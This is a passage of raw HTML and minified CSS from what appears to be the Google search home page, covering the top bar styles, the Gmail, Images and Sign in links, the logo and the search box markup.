#c6c6c6}.gb_1{background:#f8f8f8}.gb_0,#gb a.gb_0.gb_0,.gb_1{color:#666;cursor:default;text-decoration:none}#gb a.gb_1.gb_1{cursor:default;text-decoration:none}.gb_1{border:1px solid #4285f4;font-weight:bold;outline:none;background:#4285f4;background:-moz-linear-gradient(top,#4387fd,#4683ea);background:linear-gradient(top,#4387fd,#4683ea);filter:progid:DXImageTransform.Microsoft.gradient(startColorstr=#4387fd,endColorstr=#4683ea,GradientType=0)}#gb a.gb_1.gb_1{color:#fff}.gb_1:hover{-moz-box-shadow:0 1px 0 rgba(0,0,0,.15);box-shadow:0 1px 0 rgba(0,0,0,.15)}.gb_1:active{-moz-box-shadow:inset 0 2px 0 rgba(0,0,0,.15);box-shadow:inset 0 2px 0 rgba(0,0,0,.15);background:#3c78dc;background:-moz-linear-gradient(top,#3c7ae4,#3f76d3);background:linear-gradient(top,#3c7ae4,#3f76d3);filter:progid:DXImageTransform.Microsoft.gradient(startColorstr=#3c7ae4,endColorstr=#3f76d3,GradientType=0)}.gb_ya{display:none!important}.gb_za{visibility:hidden}.gb_ed{display:inline-block;vertical-align:middle}.gb_wf{position:relative}.gb_A{display:inline-block;outline:none;vertical-align:middle;-moz-border-radius:2px;border-radius:2px;-moz-box-sizing:border-box;box-sizing:border-box;height:40px;width:40px;color:#000;cursor:pointer;text-decoration:none}#gb#gb a.gb_A{color:#000;cursor:pointer;text-decoration:none}.gb_1a{border-color:transparent;border-bottom-color:#fff;border-style:dashed dashed solid;border-width:0 8.5px 8.5px;display:none;position:absolute;left:11.5px;top:43px;z-index:1;height:0;width:0;-moz-animation:gb__a .2s;animation:gb__a .2s}.gb_2a{border-color:transparent;border-style:dashed dashed solid;border-width:0 8.5px 8.5px;display:none;position:absolute;left:11.5px;z-index:1;height:0;width:0;-moz-animation:gb__a .2s;animation:gb__a .2s;border-bottom-color:#ccc;border-bottom-color:rgba(0,0,0,.2);top:42px}x:-o-prefocus,div.gb_2a{border-bottom-color:#ccc}.gb_C{background:#fff;border:1px solid #ccc;border-color:rgba(0,0,0,.2);color:#000;-moz-box-shadow:0 2px 10px rgba(0,0,0,.2);box-shadow:0 2px 10px rgba(0,0,0,.2);display:none;outline:none;overflow:hidden;position:absolute;right:8px;top:62px;-moz-animation:gb__a .2s;animation:gb__a .2s;-moz-border-radius:2px;border-radius:2px;-moz-user-select:text}.gb_ed.gb_ja .gb_1a,.gb_ed.gb_ja .gb_2a,.gb_ed.gb_ja .gb_C,.gb_ja.gb_C{display:block}.gb_ed.gb_ja.gb_xf .gb_1a,.gb_ed.gb_ja.gb_xf .gb_2a{display:none}.gb_yf{position:absolute;right:8px;top:62px;z-index:-1}.gb_Ha .gb_1a,.gb_Ha .gb_2a,.gb_Ha .gb_C{margin-top:-10px}.gb_ed:first-child,#gbsfw:first-child+.gb_ed{padding-left:4px}.gb_na.gb_Oe .gb_ed:first-child{padding-left:0}.gb_Pe{position:relative}.gb_Pc .gb_Pe,.gb_Vd .gb_Pe{float:right}.gb_A{padding:8px;cursor:pointer}.gb_na .gb_6c:not(.gb_W):focus img{background-color:rgba(0,0,0,0.20);outline:none;-moz-border-radius:50%;border-radius:50%}.gb_Qe button:focus svg,.gb_Qe button:hover svg,.gb_Qe button:active svg,.gb_A:focus,.gb_A:hover,.gb_A:active,.gb_A[aria-expanded=true]{outline:none;-moz-border-radius:50%;border-radius:50%}.gb_yc .gb_Qe.gb_Re button:focus svg,.gb_yc .gb_Qe.gb_Re button:focus:hover svg,.gb_Qe button:focus svg,.gb_Qe button:focus:hover svg,.gb_A:focus,.gb_A:focus:hover{background-color:rgba(60,64,67,0.1)}.gb_yc .gb_Qe.gb_Re button:active svg,.gb_Qe button:active svg,.gb_A:active{background-color:rgba(60,64,67,0.12)}.gb_yc .gb_Qe.gb_Re button:hover svg,.gb_Qe button:hover svg,.gb_A:hover{background-color:rgba(60,64,67,0.08)}.gb_ga .gb_A.gb_Ka:hover{background-color:transparent}.gb_A[aria-expanded=true],.gb_A:hover[aria-expanded=true]{background-color:rgba(95,99,104,0.24)}.gb_A[aria-expanded=true] .gb_Se,.gb_A[aria-expanded=true] .gb_Te{fill:#5f6368;opacity:1}.gb_yc .gb_Qe button:hover svg,.gb_yc .gb_A:hover{background-color:rgba(232,234,237,0.08)}.gb_yc .gb_Qe button:focus svg,.gb_yc .gb_Qe button:focus:hover svg,.gb_yc .gb_A:focus,.gb_yc .gb_A:focus:hover{background-color:rgba(232,234,237,0.10)}.gb_yc .gb_Qe button:active svg,.gb_yc .gb_A:active{background-color:rgba(232,234,237,0.12)}.gb_yc .gb_A[aria-expanded=true],.gb_yc .gb_A:hover[aria-expanded=true]{background-color:rgba(255,255,255,0.12)}.gb_yc .gb_A[aria-expanded=true] .gb_Se,.gb_yc .gb_A[aria-expanded=true] .gb_Te{fill:#ffffff;opacity:1}.gb_ed{padding:4px}.gb_na.gb_Oe .gb_ed{padding:4px 2px}.gb_na.gb_Oe .gb_La.gb_ed{padding-left:6px}.gb_C{z-index:991;line-height:normal}.gb_C.gb_Ue{left:8px;right:auto}@media (max-width:350px){.gb_C.gb_Ue{left:0}}.gb_Ve .gb_C{top:56px}.gb_z .gb_A,.gb_B .gb_z .gb_A{background-position:-64px -29px}.gb_g .gb_z .gb_A{background-position:-29px -29px;opacity:1}.gb_z .gb_A,.gb_z .gb_A:hover,.gb_z .gb_A:focus{opacity:1}.gb_Fd{display:none}.gb_Xc{font-family:Google Sans,Roboto,RobotoDraft,Helvetica,Arial,sans-serif;font-size:20px;font-weight:400;letter-spacing:0.25px;line-height:48px;margin-bottom:2px;opacity:1;overflow:hidden;padding-left:16px;position:relative;text-overflow:ellipsis;vertical-align:middle;top:2px;white-space:nowrap;flex:1 1 auto}.gb_Xc.gb_Zc{color:#3c4043}.gb_na.gb_oa .gb_Xc{margin-bottom:0}.gb_0c.gb_1c .gb_Xc{padding-left:4px}.gb_na.gb_oa .gb_2c{position:relative;top:-2px}.gb_na{color:black;min-width:320px;position:relative;-moz-transition:box-shadow 250ms;transition:box-shadow 250ms}.gb_na.gb_Hc{min-width:240px}.gb_na.gb_Hd .gb_Id{display:none}.gb_na.gb_Hd .gb_Jd{height:56px}header.gb_na{display:block}.gb_na svg{fill:currentColor}.gb_Kd{position:fixed;top:0;width:100%}.gb_Ld{-moz-box-shadow:0px 4px 5px 0px rgba(0,0,0,0.14),0px 1px 10px 0px rgba(0,0,0,0.12),0px 2px 4px -1px rgba(0,0,0,0.2);box-shadow:0px 4px 5px 0px rgba(0,0,0,0.14),0px 1px 10px 0px rgba(0,0,0,0.12),0px 2px 4px -1px rgba(0,0,0,0.2)}.gb_Md{height:64px}.gb_Jd{box-sizing:border-box;position:relative;width:100%;display:-webkit-box;display:-moz-box;display:-ms-flexbox;display:-webkit-flex;display:flex;justify-content:space-between;min-width:-webkit-min-content;min-width:-moz-min-content;min-width:-ms-min-content;min-width:min-content}.gb_na:not(.gb_oa) .gb_Jd{padding:8px}.gb_na.gb_Nd .gb_Jd{flex:1 0 auto}.gb_na .gb_Jd.gb_Od.gb_Pd{min-width:0}.gb_na.gb_oa .gb_Jd{padding:4px;padding-left:8px;min-width:0}.gb_Id{height:48px;vertical-align:middle;white-space:nowrap;-moz-box-align:center;align-items:center;display:-webkit-box;display:-moz-box;display:-ms-flexbox;display:-webkit-flex;display:flex;-moz-user-select:-moz-none}.gb_Rd>.gb_Id{display:table-cell;width:100%}.gb_0c{padding-right:30px;-moz-box-sizing:border-box;box-sizing:border-box;flex:1 0 auto}.gb_na.gb_oa .gb_0c{padding-right:14px}.gb_Sd{flex:1 1 100%}.gb_Sd>:only-child{display:inline-block}.gb_Td.gb_Qc{padding-left:4px}.gb_Td.gb_Ud,.gb_na.gb_Nd .gb_Td,.gb_na.gb_oa:not(.gb_Vd) .gb_Td{padding-left:0}.gb_na.gb_oa .gb_Td.gb_Ud{padding-right:0}.gb_na.gb_oa .gb_Td.gb_Ud .gb_ga{margin-left:10px}.gb_Qc{display:inline}.gb_na.gb_Kc .gb_Td.gb_Wd,.gb_na.gb_Vd .gb_Td.gb_Wd{padding-left:2px}.gb_Xc{display:inline-block}.gb_Td{box-sizing:border-box;height:48px;line-height:normal;padding:0 4px;padding-left:30px;flex:0 0 auto;justify-content:flex-end}.gb_Vd{height:48px}.gb_na.gb_Vd{min-width:initial;min-width:auto}.gb_Vd .gb_Td{float:right;padding-left:32px}.gb_Vd .gb_Td.gb_Xd{padding-left:0}.gb_Zd{font-size:14px;max-width:200px;overflow:hidden;padding:0 12px;text-overflow:ellipsis;white-space:nowrap;-moz-user-select:text}.gb_0d{transition:background-color .4s}.gb_1d{color:black}.gb_yc{color:white}.gb_na a,.gb_Dc a{color:inherit}.gb_q{color:rgba(0,0,0,0.87)}.gb_na svg,.gb_Dc svg,.gb_0c .gb_2d,.gb_Pc .gb_2d{color:#5f6368;opacity:1}.gb_yc svg,.gb_Dc.gb_Ic svg,.gb_yc .gb_0c .gb_2d,.gb_yc .gb_0c .gb_xc,.gb_yc .gb_0c .gb_2c,.gb_Dc.gb_Ic .gb_2d{color:rgba(255,255,255,0.87)}.gb_yc .gb_0c .gb_wc:not(.gb_3d){opacity:0.87}.gb_Zc{color:inherit;opacity:1;text-rendering:optimizeLegibility;-moz-osx-font-smoothing:grayscale}.gb_yc .gb_Zc,.gb_1d .gb_Zc{opacity:1}.gb_4d{position:relative}.gb_5d{font-family:arial,sans-serif;line-height:normal;padding-right:15px}a.gb_d,span.gb_d{color:rgba(0,0,0,0.87);text-decoration:none}.gb_yc a.gb_d,.gb_yc span.gb_d{color:white}a.gb_d:focus{outline-offset:2px}a.gb_d:hover{text-decoration:underline}.gb_e{display:inline-block;padding-left:15px}.gb_e .gb_d{display:inline-block;line-height:24px;vertical-align:middle}.gb_6d{font-family:Google Sans,Roboto,RobotoDraft,Helvetica,Arial,sans-serif;font-weight:500;font-size:14px;letter-spacing:0.25px;line-height:16px;margin-left:10px;margin-right:8px;min-width:96px;padding:9px 23px;text-align:center;vertical-align:middle;-moz-border-radius:4px;border-radius:4px;-moz-box-sizing:border-box;box-sizing:border-box}.gb_na.gb_Vd .gb_6d{margin-left:8px}#gb a.gb_1.gb_1.gb_6d,#gb a.gb_0.gb_0.gb_6d{cursor:pointer}.gb_1.gb_6d:hover{background:#2b7de9;-moz-box-shadow:0 1px 2px 0 rgba(66,133,244,0.3),0 1px 3px 1px rgba(66,133,244,0.15);box-shadow:0 1px 2px 0 rgba(66,133,244,0.3),0 1px 3px 1px rgba(66,133,244,0.15)}.gb_1.gb_6d:focus,.gb_1.gb_6d:hover:focus{background:#5094ed;-moz-box-shadow:0 1px 2px 0 rgba(66,133,244,0.3),0 1px 3px 1px rgba(66,133,244,0.15);box-shadow:0 1px 2px 0 rgba(66,133,244,0.3),0 1px 3px 1px rgba(66,133,244,0.15)}.gb_1.gb_6d:active{background:#63a0ef;-moz-box-shadow:0 1px 2px 0 rgba(66,133,244,0.3),0 1px 3px 1px rgba(66,133,244,0.15);box-shadow:0 1px 2px 0 rgba(66,133,244,0.3),0 1px 3px 1px rgba(66,133,244,0.15)}.gb_6d:not(.gb_0){background:#1a73e8;border:1px solid transparent}.gb_na.gb_oa .gb_6d{padding:9px 15px;min-width:80px}.gb_7d{text-align:left}#gb a.gb_6d.gb_0,#gb .gb_yc a.gb_6d,#gb.gb_yc a.gb_6d{background:#ffffff;border-color:#dadce0;-moz-box-shadow:none;box-shadow:none;color:#1a73e8}#gb a.gb_1.gb_ha.gb_6d{background:#8ab4f8;border:1px solid transparent;-moz-box-shadow:none;box-shadow:none;color:#202124}#gb a.gb_6d.gb_0:hover,#gb .gb_yc a.gb_6d:hover,#gb.gb_yc a.gb_6d:hover{background:#f8fbff;border-color:#cce0fc}#gb a.gb_1.gb_ha.gb_6d:hover{background:#93baf9;border-color:transparent;-moz-box-shadow:0 1px 3px 1px rgba(0,0,0,0.15),0 1px 2px rgba(0,0,0,0.3);box-shadow:0 1px 3px 1px rgba(0,0,0,0.15),0 1px 2px rgba(0,0,0,0.3)}#gb a.gb_6d.gb_0:focus,#gb a.gb_6d.gb_0:focus:hover,#gb .gb_yc a.gb_6d:focus,#gb .gb_yc a.gb_6d:focus:hover,#gb.gb_yc a.gb_6d:focus,#gb.gb_yc a.gb_6d:focus:hover{background:#f4f8ff;border-color:#c9ddfc}#gb a.gb_1.gb_ha.gb_6d:focus,#gb a.gb_1.gb_ha.gb_6d:focus:hover{background:#a6c6fa;border-color:transparent;-moz-box-shadow:none;box-shadow:none}#gb a.gb_6d.gb_0:active,#gb .gb_yc a.gb_6d:active,#gb.gb_yc a.gb_6d:active{background:#ecf3fe}#gb a.gb_1.gb_ha.gb_6d:active{background:#a1c3f9;-moz-box-shadow:0 1px 2px rgba(60,64,67,0.3),0 2px 6px 2px rgba(60,64,67,0.15);box-shadow:0 1px 2px rgba(60,64,67,0.3),0 2px 6px 2px rgba(60,64,67,0.15)}#gb a.gb_6d.gb_0:not(.gb_ha):active{-moz-box-shadow:0 1px 2px 0 rgba(60,64,67,0.3),0 2px 6px 2px rgba(60,64,67,0.15);box-shadow:0 1px 2px 0 rgba(60,64,67,0.3),0 2px 6px 2px rgba(60,64,67,0.15)}.gb_ga{background-color:rgba(255,255,255,0.88);border:1px solid #dadce0;box-sizing:border-box;cursor:pointer;display:inline-block;max-height:48px;overflow:hidden;outline:none;padding:0;vertical-align:middle;width:134px;-moz-border-radius:8px;border-radius:8px}.gb_ga.gb_ha{background-color:transparent;border:1px solid #5f6368}.gb_ia{display:inherit}.gb_ga.gb_ha .gb_ia{background:#ffffff;-moz-border-radius:4px;border-radius:4px;display:inline-block;left:8px;margin-right:5px;position:relative;padding:3px;top:-1px}.gb_ga:hover{border:1px solid #d2e3fc;background-color:rgba(248,250,255,0.88)}.gb_ga.gb_ha:hover{background-color:rgba(241,243,244,0.04);border:1px solid #5f6368}.gb_ga:focus{background-color:rgba(255,255,255);border:1px solid #fff;-moz-box-shadow:0px 1px 2px 0px rgba(60,64,67,0.3),0px 1px 3px 1px rgba(60,64,67,0.15);box-shadow:0px 1px 2px 0px rgba(60,64,67,0.3),0px 1px 3px 1px rgba(60,64,67,0.15)}.gb_ga.gb_ha:focus{background-color:rgba(241,243,244,0.12);border:1px solid #f1f3f4;-moz-box-shadow:0 1px 3px 1px rgba(0,0,0,0.15),0 1px 2px 0 rgba(0,0,0,0.3);box-shadow:0 1px 3px 1px rgba(0,0,0,0.15),0 1px 2px 0 rgba(0,0,0,0.3)}.gb_ga.gb_ha:active,.gb_ga.gb_ja.gb_ha:focus{background-color:rgba(241,243,244,0.1);border:1px solid #5f6368}.gb_ka{display:inline-block;padding-bottom:2px;padding-left:7px;padding-top:2px;text-align:center;vertical-align:middle;line-height:32px;width:78px}.gb_ga.gb_ha .gb_ka{line-height:26px;margin-left:0;padding-bottom:0;padding-left:0;padding-top:0;width:72px}.gb_ka.gb_la{background-color:#f1f3f4;-moz-border-radius:4px;border-radius:4px;margin-left:8px;padding-left:0}.gb_ka.gb_la .gb_ma{vertical-align:middle}.gb_na:not(.gb_oa) .gb_ga{margin-left:10px;margin-right:4px}.gb_pa{max-height:32px;width:78px}.gb_ga.gb_ha .gb_pa{max-height:26px;width:72px}.gb_Aa{background-size:32px 32px;border:0;-moz-border-radius:50%;border-radius:50%;display:block;margin:0px;position:relative;height:32px;width:32px;z-index:0}.gb_Ba{background-color:#e8f0fe;border:1px solid rgba(32,33,36,.08);position:relative}.gb_Ba.gb_Aa{height:30px;width:30px}.gb_Ba.gb_Aa:hover,.gb_Ba.gb_Aa:active{-moz-box-shadow:none;box-shadow:none}.gb_Ca{background:#fff;border:none;-moz-border-radius:50%;border-radius:50%;bottom:2px;-moz-box-shadow:0px 1px 2px 0px rgba(60,64,67,.30),0px 1px 3px 1px rgba(60,64,67,.15);box-shadow:0px 1px 2px 0px rgba(60,64,67,.30),0px 1px 3px 1px rgba(60,64,67,.15);height:14px;margin:2px;position:absolute;right:0;width:14px}.gb_Da{color:#1f71e7;font:400 22px/32px Google Sans,Roboto,RobotoDraft,Helvetica,Arial,sans-serif;text-align:center;text-transform:uppercase}@media (min-resolution:1.25dppx),(-o-min-device-pixel-ratio:5/4),(-webkit-min-device-pixel-ratio:1.25),(min-device-pixel-ratio:1.25){.gb_Aa::before{display:inline-block;-moz-transform:scale(.5);transform:scale(.5);-moz-transform-origin:left 0;transform-origin:left 0}.gb_Ea::before{display:inline-block;-moz-transform:scale(.5);transform:scale(.5);-moz-transform-origin:left 0;transform-origin:left 0}.gb_i .gb_Ea::before{-moz-transform:scale(0.416666667);transform:scale(0.416666667)}}.gb_Aa:hover,.gb_Aa:focus{-moz-box-shadow:0 1px 0 rgba(0,0,0,.15);box-shadow:0 1px 0 rgba(0,0,0,.15)}.gb_Aa:active{-moz-box-shadow:inset 0 2px 0 rgba(0,0,0,.15);box-shadow:inset 0 2px 0 rgba(0,0,0,.15)}.gb_Aa:active::after{background:rgba(0,0,0,.1);-moz-border-radius:50%;border-radius:50%;content:'';display:block;height:100%}.gb_Fa{cursor:pointer;line-height:40px;min-width:30px;opacity:.75;overflow:hidden;vertical-align:middle;text-overflow:ellipsis}.gb_A.gb_Fa{width:auto}.gb_Fa:hover,.gb_Fa:focus{opacity:.85}.gb_Ha .gb_Fa,.gb_Ha .gb_Ia{line-height:26px}#gb#gb.gb_Ha a.gb_Fa,.gb_Ha .gb_Ia{font-size:11px;height:auto}.gb_Ja{border-top:4px solid #000;border-left:4px dashed transparent;border-right:4px dashed transparent;display:inline-block;margin-left:6px;opacity:.75;vertical-align:middle}.gb_Ka:hover .gb_Ja{opacity:.85}.gb_ga>.gb_La{padding:3px 3px 3px 4px}.gb_Ma.gb_za{color:#fff}.gb_Aa.gb_Na{clip-path:path('M16 0C24.8366 0 32 7.16344 32 16C32 16.4964 31.9774 16.9875 31.9332 17.4723C30.5166 16.5411 28.8215 16 27 16C22.0294 16 18 20.0294 18 25C18 27.4671 18.9927 29.7024 20.6004 31.3282C19.1443 31.7653 17.5996 32 16 32C7.16344 32 0 24.8366 0 16C0 7.16344 7.16344 0 16 0Z')}.gb_Oa{-moz-border-radius:50%;border-radius:50%;-moz-box-shadow:0px 1px 2px 0px rgba(60,64,67,.30),0px 1px 3px 1px rgba(60,64,67,.15);box-shadow:0px 1px 2px 0px rgba(60,64,67,.30),0px 1px 3px 1px rgba(60,64,67,.15);margin:2px}.gb_Pa{fill:#d93025}.gb_Qa{fill:white}.gb_ha .gb_Pa{fill:#f28b82}.gb_ha .gb_Qa{fill:#202124}.gb_Ra{-moz-border-radius:50%;border-radius:50%;bottom:2px;height:18px;position:absolute;right:0px;width:18px}.gb_g .gb_Fa,.gb_g .gb_Ja{opacity:1}#gb#gb.gb_g.gb_g a.gb_Fa,#gb#gb .gb_g.gb_g a.gb_Fa{color:#fff}.gb_g.gb_g .gb_Ja{border-top-color:#fff;opacity:1}.gb_B .gb_Aa:hover,.gb_g .gb_Aa:hover,.gb_B .gb_Aa:focus,.gb_g .gb_Aa:focus{-moz-box-shadow:0 1px 0 rgba(0,0,0,.15),0 1px 2px rgba(0,0,0,.2);box-shadow:0 1px 0 rgba(0,0,0,.15),0 1px 2px rgba(0,0,0,.2)}.gb_Sa .gb_La,.gb_Ta .gb_La{position:absolute;right:1px}.gb_La.gb_f,.gb_Ua.gb_f,.gb_Ka.gb_f{flex:0 1 auto;flex:0 1 main-size}.gb_Va.gb_Wa .gb_Fa{width:30px!important}.gb_Xa{height:40px;position:absolute;right:-5px;top:-5px;width:40px}.gb_Za .gb_Xa,.gb_0a .gb_Xa{right:0;top:0}.gb_La .gb_A{padding:4px}.gb_9d{display:none}sentinel{}.z1asCe{display:inline-block;fill:currentColor;height:24px;line-height:24px;position:relative;width:24px}.z1asCe svg{display:block;height:100%;width:100%}</style></head><body jsmodel="hspDDf"><style>.L3eUgb{display:flex;flex-direction:column;height:100%}.o3j99{flex-shrink:0;box-sizing:border-box}.n1xJcf{height:60px}.LLD4me{min-height:150px;max-height:290px;height:calc(100% - 560px)}.yr19Zb{min-height:92px}.ikrT4e{max-height:160px}.qarstb{flex-grow:1}</style><div class="L3eUgb" data-hveid="1"><div class="o3j99 n1xJcf Ne6nSd"><style>.Ne6nSd{display:flex;align-items:center;padding:6px}.LX3sZb{display:inline-block;flex-grow:1}</style><div class="LX3sZb"><div class="gb_na gb_Vd gb_Za" id="gb"><div class="gb_Td gb_Va gb_Id" data-ogsr-up=""><div><div class="gb_5d gb_f gb_jg gb_ag" data-ogbl=""><div class="gb_e gb_f"><a class="gb_d" data-pid="23" href="https://mail.google.com/mail/&ogbl" target="_top">Gmail</a></div><div class="gb_e gb_f"><a class="gb_d" data-pid="2" href="https://www.google.co.in/imghp?hl=en&ogbl" target="_top">Images</a></div></div></div><div class="gb_Pe"><div class="gb_Qc"><div class="gb_z gb_ed gb_f gb_xf" data-ogsr-fb="true" data-ogsr-alt="" id="gbwa"><div class="gb_wf"><a class="gb_A" aria-label="Google apps" href="https://www.google.co.in/intl/en/about/products" aria-expanded="false" role="button" tabindex="0"><svg class="gb_Se" focusable="false" viewbox="0 0 24 24"><path d="M6,8c1.1,0 2,-0.9 2,-2s-0.9,-2 -2,-2 -2,0.9 -2,2 0.9,2 2,2zM12,20c1.1,0 2,-0.9 2,-2s-0.9,-2 -2,-2 -2,0.9 -2,2 0.9,2 2,2zM6,20c1.1,0 2,-0.9 2,-2s-0.9,-2 -2,-2 -2,0.9 -2,2 0.9,2 2,2zM6,14c1.1,0 2,-0.9 2,-2s-0.9,-2 -2,-2 -2,0.9 -2,2 0.9,2 2,2zM12,14c1.1,0 2,-0.9 2,-2s-0.9,-2 -2,-2 -2,0.9 -2,2 0.9,2 2,2zM16,6c0,1.1 0.9,2 2,2s2,-0.9 2,-2 -0.9,-2 -2,-2 -2,0.9 -2,2zM12,8c1.1,0 2,-0.9 2,-2s-0.9,-2 -2,-2 -2,0.9 -2,2 0.9,2 2,2zM18,14c1.1,0 2,-0.9 2,-2s-0.9,-2 -2,-2 -2,0.9 -2,2 0.9,2 2,2zM18,20c1.1,0 2,-0.9 2,-2s-0.9,-2 -2,-2 -2,0.9 -2,2 0.9,2 2,2z"></path></svg></a></div></div></div><a class="gb_1 gb_2 gb_6d gb_6c" href="https://accounts.google.com/ServiceLogin?hl=en&passive=true&continue=https://www.google.com/%3Fgws_rd%3Dssl&ec=GAZAmgQ" target="_top">Sign in</a></div></div></div></div></div><div class="o3j99 LLD4me yr19Zb LS8OJ"><style>.LS8OJ{display:flex;flex-direction:column;align-items:center}.k1zIA{height:100%;margin-top:auto}</style><div class="k1zIA rSk4se"><style>.rSk4se{max-height:92px;position:relative}.lnXdpd{max-height:100%;max-width:100%;object-fit:contain;object-position:center bottom;width:auto}</style><img class="lnXdpd" alt="Google" height="92" src="/images/branding/googlelogo/2x/googlelogo_color_272x92dp.png" srcset="/images/branding/googlelogo/1x/googlelogo_color_272x92dp.png 1x, /images/branding/googlelogo/2x/googlelogo_color_272x92dp.png 2x" width="272"></div></div><div class="o3j99 ikrT4e om7nvf"><style>.om7nvf{padding:20px}</style><form action="/search" method="GET" role="search"> <div jsmodel=" vWNDde " jsdata="MuIEvd;_;Cc3pTk"> <div jscontroller="cnjECf" jsmodel="QubRsd " class="A8SBwf" jsdata="LVplcb;_;" jsaction="lX6RWd:w3Wsmc;DkpM0b:d3sQLd;IQOavd:dFyQEf;XzZZPe:jI3wzf;Aghsf:AVsnlb;iHd9U:Q7Cnrc;f5hEHe:G0jgYd;vmxUb:j3bJnb;R2c5O:LuRugf;qiCkJd:ANdidc;NOg9L:HLgh3;uGoIkd:epUokb;zLdLw:eaGBS;rcuQ6b:npT2md"><style>.A8SBwf{margin:0 auto;width:640px;padding-top:6px;width:auto;max-width:584px;position:relative;}.RNNXgb{display:flex;z-index:3;height:44px;background:#fff;border:1px solid #dfe1e5;box-shadow:none;border-radius:24px;margin:0 auto;width:638px;width:auto;max-width:584px;}.minidiv .RNNXgb{height:32px;border-radius:16px;margin:10px 0 0;background:#fff;}.emcav .RNNXgb{border-bottom-left-radius:0;border-bottom-right-radius:0;box-shadow:0 1px 6px rgba(32,33,36,.28);border-color:rgba(223,225,229,0);}.minidiv .emcav .RNNXgb{border-bottom-left-radius:0;border-bottom-right-radius:0;}.emcav.emcat .RNNXgb{border-bottom-left-radius:24px;border-bottom-right-radius:24px}.minidiv .emcav.emcat .RNNXgb{border-bottom-left-radius:16px;border-bottom-right-radius:16px}.RNNXgb:hover,.sbfc .RNNXgb{background-color:#fff;box-shadow:0 1px 6px rgba(32,33,36,.28);border-color:rgba(223,225,229,0)}.SDkEP{flex:1;display:flex;padding:5px 8px 0 14px;}.minidiv .SDkEP{padding-top:0}.FPdoLc{padding-top:18px}.iblpc{display:flex;align-items:center;padding-right:13px;margin-top:-5px}.minidiv .iblpc{margin-top:0}</style><style>.CKb9sd{background:none;display:flex;flex:0 0 auto}</style><div class="RNNXgb" jsname="RNNXgb"><div class="SDkEP"><div class="iblpc" jsname="uFMOof"><style>.CcAdNb{margin:auto}.QCzoEc{margin-top:3px;color:#9aa0a6;height:20px;width:20px}</style><div class="CcAdNb"><span class="QCzoEc z1asCe MZy1Rb"><svg focusable="false" xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24"><path d="M15.5 14h-.79l-.28-.27A6.471 6.471 0 0 0 16 9.5 6.5 6.5 0 1 0 9.5 16c1.61 0 3.09-.59 4.23-1.57l.27.28v.79l5 4.99L20.49 19l-4.99-5zm-6 0C7.01 14 5 11.99 5 9.5S7.01 5 9.5 5 14 7.01 14 9.5 11.99 14 9.5 14z"></path></svg></span></div></div><div jscontroller="vZr2rb" class="a4bIc" jsname="gLFyf" jsaction="h5M12e;input:d3sQLd;blur:jI3wzf"><style>.gLFyf{background-color:transparent;border:none;margin:0;padding:0;color:rgba(0,0,0,.87);word-wrap:break-word;outline:none;display:flex;flex:100%;tap-highlight-color:transparent;margin-top:-37px;height:34px;font-size:16px;}.minidiv .gLFyf{margin-top:-35px;}.a4bIc{display:flex;flex:1;flex-wrap:wrap}.YacQv{color:transparent;flex:100%;white-space:pre;height:34px;font-size:16px;}.YacQv span{background:url("/images/experiments/wavy-underline.png") repeat-x scroll 0 100% transparent;padding:0 0 10px 0;}</style><div class="YacQv gsfi" jsname="vdLsw"></div><input class="gLFyf gsfi" jsaction="paste:puy29d;" maxlength="2048" name="q" type="text" aria-autocomplete="both" aria-haspopup="false" autocapitalize="off" autocomplete="off" autocorrect="off" autofocus="" role="combobox" spellcheck="false" title="Search" value="" aria-label="Search" data-ved="0ahUKEwjAk671j8X2AhWBed4KHSPlCFkQ39UDCAQ"></div><div class="dRYYxd"><style>.dRYYxd{display:flex;flex:0 0 auto;margin-top:-5px;align-items:stretch;flex-direction:row}.minidiv .dRYYxd{margin-top:0}</style> <style>.BKRPef{flex:1 0 auto;display:none;cursor:pointer;align-items:center;border:0;background:transparent;outline:none;padding:0 8px;line-height:44px}.M2vV3{display:flex}.ExCKkf{height:100%;color:#70757a;vertical-align:middle;outline:none}.minidiv .BKRPef{line-height:32px}.minidiv .ExCKkf{width:20px}</style> <div jscontroller="PymCCe" class="BKRPef" jsname="RP0xob" aria-label="Clear" role="button" jsaction="AVsnlb;rcuQ6b:npT2md" data-ved="0ahUKEwjAk671j8X2AhWBed4KHSPlCFkQ05YFCAU"> <span class="ExCKkf z1asCe rzyADb" jsname="itVqKe" role="button" tabindex="0"><svg focusable="false" xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24"><path d="M19 6.41L17.59 5 12 10.59 6.41 5 5 6.41 10.59 12 5 17.59 6.41 19 12 13.41 17.59 19 19 17.59 13.41 12z"></path></svg></span> </div> </div></div></div><div jscontroller="Dvn7fe" class="UUbT9" style="display:none" jsname="UUbT9" jsaction="mouseout:ItzDCd;mouseleave:MWfikb;hBEIVb:nUZ9le;YMFC3:VKssTb;vklu5c:k02QY;mMf61e:Mb6Xlc"><style>.UUbT9{position:absolute;text-align:left;z-index:3;cursor:default;user-select:none;width:100%;margin-top:-1px;}.aajZCb{display:flex;flex-direction:column;list-style-type:none;margin:0;padding:0;overflow:hidden;background:#fff;border-radius:0 0 24px 24px;box-shadow:0 4px 6px rgba(32,33,36,.28);border:0;padding-bottom:4px;}.minidiv .aajZCb{border-bottom-left-radius:16px;border-bottom-right-radius:16px}.erkvQe{padding-bottom:8px;flex:auto;}.RjPuVb{height:1px;margin:0 26px 0 0;}.S3nFnd{display:flex}.S3nFnd .RjPuVb,.S3nFnd .aajZCb{flex:0 0 auto}.lh87ke:link,.lh87ke:visited{color:#1a0dab;cursor:pointer;font:11px arial,sans-serif;padding:0 5px;margin-top:-10px;text-decoration:none;flex:auto;align-self:flex-end;margin:0 16px 5px 0}.lh87ke:hover{text-decoration:underline}.xtSCL{border-top:1px solid #e8eaed;margin:0 20px 0 14px;padding-bottom:4px}.sb7{background:url() no-repeat ;min-height:0px;min-width:0px;height:0px;width:0px}.sb27{background:url(/images/searchbox/desktop_searchbox_sprites318_hr.webp) no-repeat 0 -21px;background-size:20px;min-height:20px;min-width:20px;height:20px;width:20px}.sb43{background:url(/images/searchbox/desktop_searchbox_sprites318_hr.webp) no-repeat 0 0;background-size:20px;min-height:20px;min-width:20px;height:20px;width:20px}.sb53.sb53{padding:0 4px;margin:0}.sb33{background:url(/images/searchbox/desktop_searchbox_sprites318_hr.webp) no-repeat 0 -42px;background-size:20px;height:20px;width:20px;}</style><div class="RjPuVb" jsname="RjPuVb"></div><div class="aajZCb" jsname="aajZCb"><div class="xtSCL"></div><ul class="erkvQe" jsname="erkvQe" 